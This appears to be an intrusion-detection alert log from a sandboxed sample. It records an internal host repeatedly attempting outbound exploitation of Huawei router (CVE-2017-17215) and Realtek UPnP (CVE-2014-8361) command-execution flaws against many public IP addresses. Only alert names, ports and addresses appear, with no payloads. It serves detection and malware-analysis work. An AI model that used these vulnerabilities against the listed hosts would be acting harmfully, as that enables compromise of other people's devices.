                                      2024-07-20T23:01:21.286674+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4262252869192.168.2.23181.219.175.178
                                      2024-07-20T23:01:20.204357+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4249637215192.168.2.23157.145.57.110
                                      2024-07-20T23:00:59.222385+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5880437215192.168.2.23157.251.206.76
                                      2024-07-20T23:01:18.497886+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4135437215192.168.2.23197.93.123.78
                                      2024-07-20T23:01:09.027075+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3288052869192.168.2.23189.63.115.173
                                      2024-07-20T23:01:21.129434+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4953052869192.168.2.23132.86.136.162
                                      2024-07-20T23:00:59.201622+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4405637215192.168.2.23158.165.91.44
                                      2024-07-20T23:01:18.550419+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3876437215192.168.2.2360.176.144.80
                                      2024-07-20T23:01:21.558641+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3379637215192.168.2.23157.139.28.102
                                      2024-07-20T23:01:00.657714+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4676437215192.168.2.23197.247.217.62
                                      2024-07-20T23:01:21.946714+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4895637215192.168.2.2341.95.27.201
                                      2024-07-20T23:01:02.095698+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3345637215192.168.2.23117.206.232.47
                                      2024-07-20T23:01:19.583414+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5433652869192.168.2.2324.167.37.167
                                      2024-07-20T23:01:05.340054+0200TCP2403348ET CINS Active Threat Intelligence Poor Reputation IP group 49372153447741.38.200.66192.168.2.23
                                      2024-07-20T23:01:19.826087+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3713452869192.168.2.23129.167.170.254
                                      2024-07-20T23:01:18.397150+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4663237215192.168.2.23197.17.13.46
                                      2024-07-20T23:00:59.180699+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4426837215192.168.2.23197.187.1.61
                                      2024-07-20T23:00:59.208769+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3630437215192.168.2.2341.41.122.187
                                      2024-07-20T23:01:02.068477+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5642237215192.168.2.2341.152.253.87
                                      2024-07-20T23:01:21.676428+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6058652869192.168.2.2313.188.89.36
                                      2024-07-20T23:01:02.079114+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5372037215192.168.2.23157.43.220.26
                                      2024-07-20T23:01:21.019040+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5547052869192.168.2.23143.198.233.204
                                      2024-07-20T23:00:59.223718+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5039837215192.168.2.23157.174.150.26
                                      2024-07-20T23:01:19.869088+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5735852869192.168.2.23218.167.11.188
                                      2024-07-20T23:01:21.259313+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6002052869192.168.2.23195.64.245.14
                                      2024-07-20T23:01:21.845388+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5965052869192.168.2.2357.179.102.199
                                      2024-07-20T23:01:02.119631+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4173837215192.168.2.2341.105.49.77
                                      2024-07-20T23:01:02.088423+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4254237215192.168.2.23157.219.32.62
                                      2024-07-20T23:01:19.347530+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5976652869192.168.2.23133.66.91.121
                                      2024-07-20T23:01:00.649623+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4136837215192.168.2.23157.229.17.57
                                      2024-07-20T23:01:11.815913+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4257437215192.168.2.23157.185.20.188
                                      2024-07-20T23:01:19.861229+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4250252869192.168.2.23155.42.58.223
                                      2024-07-20T23:00:59.227759+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3639237215192.168.2.23157.153.207.206
                                      2024-07-20T23:01:18.296192+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4404037215192.168.2.2341.242.31.133
                                      2024-07-20T23:01:18.267356+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3346237215192.168.2.2341.107.86.189
                                      2024-07-20T23:01:08.939279+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4968052869192.168.2.23117.49.51.0
                                      2024-07-20T23:01:02.088423+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4893437215192.168.2.23157.121.108.79
                                      2024-07-20T23:01:21.264733+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3507252869192.168.2.23205.45.42.138
                                      2024-07-20T23:01:25.227278+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4457452869192.168.2.23216.207.228.137
                                      2024-07-20T23:01:00.661486+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5165837215192.168.2.2343.131.249.62
                                      2024-07-20T23:01:21.608712+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4219452869192.168.2.23167.134.108.32
                                      2024-07-20T23:00:59.227759+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4455237215192.168.2.2341.216.133.169
                                      2024-07-20T23:01:20.227504+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4849452869192.168.2.23124.144.192.144
                                      2024-07-20T23:00:59.171003+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4799637215192.168.2.23157.75.190.222
                                      2024-07-20T23:01:00.649623+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5290437215192.168.2.2341.190.181.48
                                      2024-07-20T23:00:59.164966+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4507637215192.168.2.2341.126.20.80
                                      2024-07-20T23:01:02.136941+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5704237215192.168.2.23148.121.203.188
                                      2024-07-20T23:00:59.208769+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3574837215192.168.2.23197.112.222.157
                                      2024-07-20T23:01:02.108705+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5360037215192.168.2.2341.131.89.154
                                      2024-07-20T23:01:04.151190+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5797852869192.168.2.23128.89.159.185
                                      2024-07-20T23:01:24.892331+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3722237215192.168.2.23144.93.159.93
                                      2024-07-20T23:01:18.506018+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4982637215192.168.2.2341.65.251.158
                                      2024-07-20T23:01:18.515987+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3555037215192.168.2.23168.165.233.141
                                      2024-07-20T23:01:18.410806+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4798237215192.168.2.23197.32.17.115
                                      2024-07-20T23:01:00.656262+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5341037215192.168.2.2319.199.208.241
                                      2024-07-20T23:01:21.199737+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5666452869192.168.2.23107.75.193.125
                                      2024-07-20T23:01:02.068327+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4951637215192.168.2.23157.195.164.122
                                      2024-07-20T23:01:21.194640+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4835637215192.168.2.2341.156.85.195
                                      2024-07-20T23:01:19.473907+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4844852869192.168.2.23191.79.195.70
                                      2024-07-20T23:01:18.292313+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3734837215192.168.2.2386.49.143.0
                                      2024-07-20T23:01:04.601975+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6059452869192.168.2.23123.31.253.14
                                      2024-07-20T23:01:19.859328+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5768252869192.168.2.2313.112.9.246
                                      2024-07-20T23:01:20.383814+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3356452869192.168.2.2354.235.197.43
                                      2024-07-20T23:01:18.416341+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5636637215192.168.2.23197.221.173.151
                                      2024-07-20T23:01:20.351771+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3765452869192.168.2.23162.220.3.30
                                      2024-07-20T23:01:21.116360+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3856452869192.168.2.23205.29.56.156
                                      2024-07-20T23:01:18.550419+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3979637215192.168.2.23197.52.45.132
                                      2024-07-20T23:01:21.631759+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4738252869192.168.2.2387.137.214.123
                                      2024-07-20T23:01:00.656262+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3392037215192.168.2.23145.149.22.179
                                      2024-07-20T23:01:20.253482+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3669452869192.168.2.23153.0.45.254
                                      2024-07-20T23:01:21.943543+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4862437215192.168.2.2341.106.80.160
                                      2024-07-20T23:01:00.658298+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5568037215192.168.2.23197.17.32.247
                                      2024-07-20T23:01:21.214202+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3872852869192.168.2.2325.222.87.118
                                      2024-07-20T23:01:02.067656+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4159637215192.168.2.23157.221.87.32
                                      2024-07-20T23:01:20.979517+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6060837215192.168.2.2341.222.48.132
                                      2024-07-20T23:01:18.263044+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3627837215192.168.2.23157.203.14.217
                                      2024-07-20T23:01:21.461356+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4590237215192.168.2.23197.209.84.96
                                      2024-07-20T23:01:22.224262+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3542052869192.168.2.2368.46.168.107
                                      2024-07-20T23:01:02.068327+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5467037215192.168.2.2341.178.90.216
                                      2024-07-20T23:01:00.649623+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5209837215192.168.2.23157.225.33.253
                                      2024-07-20T23:01:24.897385+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4566637215192.168.2.23157.217.202.87
                                      2024-07-20T23:01:21.547924+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3487452869192.168.2.23134.167.171.74
                                      2024-07-20T23:01:00.661486+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5315837215192.168.2.23197.197.73.14
                                      2024-07-20T23:01:04.444180+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5017852869192.168.2.23218.228.206.146
                                      2024-07-20T23:01:20.276054+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4721252869192.168.2.2354.68.100.131
                                      2024-07-20T23:00:59.201033+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5757637215192.168.2.23197.244.173.225
                                      2024-07-20T23:01:18.416548+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5060237215192.168.2.23157.15.115.232
                                      2024-07-20T23:01:18.295095+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3717437215192.168.2.23157.233.134.27
                                      2024-07-20T23:01:20.203275+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4195452869192.168.2.23108.144.159.228
                                      2024-07-20T23:01:21.199737+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3792637215192.168.2.23157.32.103.4
                                      2024-07-20T23:01:20.134238+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3710437215192.168.2.2348.147.199.167
                                      2024-07-20T23:01:18.514565+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4656237215192.168.2.23197.224.182.83
                                      2024-07-20T23:01:21.293559+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3624852869192.168.2.2363.80.178.96
                                      2024-07-20T23:01:19.328880+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4441452869192.168.2.2312.55.180.198
                                      2024-07-20T23:01:02.067656+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5113237215192.168.2.23157.212.218.203
                                      2024-07-20T23:01:19.809328+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6047052869192.168.2.2325.158.237.150
                                      2024-07-20T23:00:59.216912+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3739837215192.168.2.2377.13.19.125
                                      2024-07-20T23:01:19.812725+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5379852869192.168.2.2394.221.100.187
                                      2024-07-20T23:01:02.108705+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3608037215192.168.2.23223.98.49.191
                                      2024-07-20T23:01:00.658298+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3797037215192.168.2.2341.232.6.48
                                      2024-07-20T23:01:21.443334+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4212652869192.168.2.23223.193.169.99
                                      2024-07-20T23:01:20.169725+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6043837215192.168.2.23197.121.187.182
                                      2024-07-20T23:01:19.848630+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3980052869192.168.2.23172.95.79.32
                                      2024-07-20T23:01:04.621319+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3968237215192.168.2.2341.255.209.13
                                      2024-07-20T23:01:19.861971+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5976452869192.168.2.23188.112.254.56
                                      2024-07-20T23:01:21.464983+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3830852869192.168.2.23129.27.232.7
                                      2024-07-20T23:01:18.435936+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5680837215192.168.2.23197.138.137.217
                                      2024-07-20T23:01:21.202136+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4213052869192.168.2.23155.22.90.90
                                      2024-07-20T23:01:19.826663+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5612252869192.168.2.2334.53.37.254
                                      2024-07-20T23:01:00.660317+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5522837215192.168.2.231.136.199.61
                                      2024-07-20T23:01:00.661486+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4442037215192.168.2.23157.90.253.17
                                      2024-07-20T23:01:09.021221+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4716452869192.168.2.23221.226.241.204
                                      2024-07-20T23:01:18.431931+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4015037215192.168.2.2341.226.72.201
                                      2024-07-20T23:01:21.558738+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3455852869192.168.2.23201.250.207.152
                                      2024-07-20T23:01:00.664351+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4683637215192.168.2.23197.236.128.48
                                      2024-07-20T23:01:08.938949+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5109052869192.168.2.23142.90.33.83
                                      2024-07-20T23:01:09.030401+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3608452869192.168.2.23184.60.97.199
                                      2024-07-20T23:01:21.199737+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3466452869192.168.2.23146.210.17.240
                                      2024-07-20T23:01:21.048326+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3592452869192.168.2.2347.10.251.72
                                      2024-07-20T23:00:59.201033+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5223437215192.168.2.23157.17.98.184
                                      2024-07-20T23:01:02.088422+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3626637215192.168.2.23176.150.171.140
                                      2024-07-20T23:01:02.088423+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4191837215192.168.2.23157.239.203.194
                                      2024-07-20T23:01:18.596172+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5473837215192.168.2.2341.9.160.205
                                      2024-07-20T23:01:19.580103+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4122852869192.168.2.239.190.28.75
                                      2024-07-20T23:00:59.180699+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3901037215192.168.2.23157.24.24.246
                                      2024-07-20T23:01:02.108705+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4908437215192.168.2.2341.218.249.85
                                      2024-07-20T23:01:22.229921+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5643652869192.168.2.23139.21.143.158
                                      2024-07-20T23:01:21.146859+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5666052869192.168.2.23166.7.60.196
                                      2024-07-20T23:00:59.201622+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5003637215192.168.2.2388.195.110.211
                                      2024-07-20T23:01:00.654988+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3713837215192.168.2.23197.229.227.49
                                      2024-07-20T23:01:21.943543+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3669837215192.168.2.23157.83.139.204
                                      2024-07-20T23:01:21.256224+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4405652869192.168.2.2338.158.187.83
                                      2024-07-20T23:01:02.097709+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5812437215192.168.2.23197.68.112.71
                                      2024-07-20T23:01:00.656262+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5106237215192.168.2.23197.12.203.6
                                      2024-07-20T23:01:18.608485+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6015037215192.168.2.23157.12.120.37
                                      2024-07-20T23:01:09.165064+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4579852869192.168.2.23189.75.86.189
                                      2024-07-20T23:01:00.648489+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4136637215192.168.2.23197.37.15.231
                                      2024-07-20T23:01:21.275869+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4134037215192.168.2.23197.95.169.228
                                      2024-07-20T23:01:19.857203+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3360052869192.168.2.23213.241.106.75
                                      2024-07-20T23:01:20.295477+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3639252869192.168.2.23161.20.12.87
                                      2024-07-20T23:00:59.219743+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3926837215192.168.2.2341.224.244.226
                                      2024-07-20T23:01:18.596514+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5002837215192.168.2.2327.41.96.136
                                      2024-07-20T23:01:21.231934+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3863052869192.168.2.23216.151.5.50
                                      2024-07-20T23:01:18.322750+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4317637215192.168.2.23157.215.252.1
                                      2024-07-20T23:01:09.055028+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5464052869192.168.2.23207.223.182.162
                                      2024-07-20T23:01:18.596514+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5860237215192.168.2.23157.10.69.196
                                      2024-07-20T23:01:21.044874+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4013852869192.168.2.2349.39.36.55
                                      2024-07-20T23:01:00.658630+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4961837215192.168.2.23197.74.184.130
                                      2024-07-20T23:01:21.018478+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5202652869192.168.2.23186.94.179.5
                                      2024-07-20T23:00:59.238159+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3817637215192.168.2.2341.20.53.198
                                      2024-07-20T23:01:00.657714+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5990637215192.168.2.23140.34.44.126
                                      2024-07-20T23:01:18.377460+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3782637215192.168.2.2341.76.26.43
                                      2024-07-20T23:01:20.180872+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5971037215192.168.2.2323.247.196.153
                                      2024-07-20T23:01:21.518128+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5504052869192.168.2.23111.252.253.89
                                      2024-07-20T23:00:59.203029+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5040637215192.168.2.23157.51.198.43
                                      2024-07-20T23:01:21.264733+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6030052869192.168.2.2357.92.179.211
                                      2024-07-20T23:01:19.554405+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4473652869192.168.2.23190.124.94.237
                                      2024-07-20T23:01:00.649623+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4516437215192.168.2.2341.244.169.9
                                      2024-07-20T23:01:18.248248+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4401437215192.168.2.23143.179.199.146
                                      2024-07-20T23:00:59.171002+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4922637215192.168.2.2341.124.14.171
                                      2024-07-20T23:01:00.657714+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5192637215192.168.2.2341.13.46.200
                                      2024-07-20T23:01:21.273032+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5604052869192.168.2.2362.90.39.173
                                      2024-07-20T23:00:59.170218+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5725637215192.168.2.23157.43.107.32
                                      2024-07-20T23:01:00.661486+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3861437215192.168.2.23157.207.43.131
                                      2024-07-20T23:00:59.175742+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5275237215192.168.2.23157.176.101.215
                                      2024-07-20T23:00:59.236479+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4632637215192.168.2.23157.222.120.169
                                      2024-07-20T23:01:21.008960+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5489052869192.168.2.2325.0.169.170
